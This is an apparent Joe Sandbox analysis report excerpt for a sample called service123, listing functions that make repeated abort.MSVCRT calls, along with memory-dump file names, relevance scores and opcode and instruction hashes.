abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 365c2cac55f7eac7746b9ffdea6253eb9016567c5bf37bc91cb59288ab8ec19d
Instruction ID: 9fb87ef8f308db4a6ac850c479d680ebf2ba5512d51f2a8a3a3ef5710d2eea02
Opcode Fuzzy Hash: 365c2cac55f7eac7746b9ffdea6253eb9016567c5bf37bc91cb59288ab8ec19d
Instruction Fuzzy Hash: 9F01E8B2652201CFE744FF28D891B55B7B0FB11309F019B58D594DBA11DB39E828CF91

Function 6C2C28BB Relevance: 42.1, APIs: 28, Instructions: 73COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C396CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: d077220950d5c73340e60af2e1e42e83e2a64888911220924920bf8c462cc7b1
Instruction ID: 630e40132e170a233fa0747c2fc621dc9ff15a6bf51737db3c51d905c15e8b75
Opcode Fuzzy Hash: d077220950d5c73340e60af2e1e42e83e2a64888911220924920bf8c462cc7b1
Instruction Fuzzy Hash: 3A013CB2646205CBE748FF18D4D1B5AB7B0FB11309F019A48D9959BB01DB35E828CF92

Function 6C2C2A6E Relevance: 42.1, APIs: 28, Instructions: 71COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C396CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f61c8ec7e1289add9ae94c0aeb116b23fd47bcae568ea1fe99e7afa9de71f081
Instruction ID: d65a3b9c87447c121d55111a467fb2a3ff375ee29366c9da07d6b2543a72cb60
Opcode Fuzzy Hash: f61c8ec7e1289add9ae94c0aeb116b23fd47bcae568ea1fe99e7afa9de71f081
Instruction Fuzzy Hash: 23014FB2642201CBD744FF18D4D1B59B7B0FF11309F019A48D4949BB01DB35E428CF92

Function 6C2C2B13 Relevance: 42.1, APIs: 28, Instructions: 69COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C396CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 907ec6de10620ad9471481c691b05e45ceef18a0144012a9a23514f0c02c4283
Instruction ID: 80fbacc247a02c59abd207a4630a2d440f2241b4f918f7748df4d6e53795daf9
Opcode Fuzzy Hash: 907ec6de10620ad9471481c691b05e45ceef18a0144012a9a23514f0c02c4283
Instruction Fuzzy Hash: 2AF049B2646205CBD744FF18D4A1B6AB7B0FF12309F019A48D8949BB01DB39E428CF92

Function 6C2C29B1 Relevance: 42.1, APIs: 28, Instructions: 67COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C396CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 8b4bbd2899609e28c7d4e7cec85c57fb2a9526f7ff190c0020f8e54d83abb7ed
Instruction ID: 4610e1a4e6e64e42b5e1657f026a6a0b9e2534680825c96a6ee2831c101b2f00
Opcode Fuzzy Hash: 8b4bbd2899609e28c7d4e7cec85c57fb2a9526f7ff190c0020f8e54d83abb7ed
Instruction Fuzzy Hash: C7F01DB1545205CBD784EF58D0A5B6AB770FF12308F119A48D8549BB45DB35E428CF86

Function 6C2C2AAD Relevance: 42.1, APIs: 28, Instructions: 65COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C396CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6f75505489c9856d60ea4e05d93ccdee5d76ef7a4f84d2ee15c5560421f0e86b
Instruction ID: 6e20ea3ec219c35cdf476671a484a3a082bd458bed5464696cc0dae0afdbbc7e
Opcode Fuzzy Hash: 6f75505489c9856d60ea4e05d93ccdee5d76ef7a4f84d2ee15c5560421f0e86b
Instruction Fuzzy Hash: BEF030B1545215CBD744EF18C0A1B6AB770FF12308F019A48D8559BE46DB35E428CFC2

Function 6C2CB930 Relevance: 40.6, APIs: 27, Instructions: 135COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 29fd9e686b1703b0e2ae9b4a009892b017c26000ff9a63f5be9ae01ed2e48251
Instruction ID: a1d962e211f729c0285169bbd6f96cdc0bbd3d789fd56755790b8a963507b565
Opcode Fuzzy Hash: 29fd9e686b1703b0e2ae9b4a009892b017c26000ff9a63f5be9ae01ed2e48251
Instruction Fuzzy Hash: DB314530749B0D9FC780DE59C481796B3F9EB49315F408A2AEEA887B41D334A814DF92

Function 6C2CBFCC Relevance: 39.1, APIs: 26, Instructions: 63COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
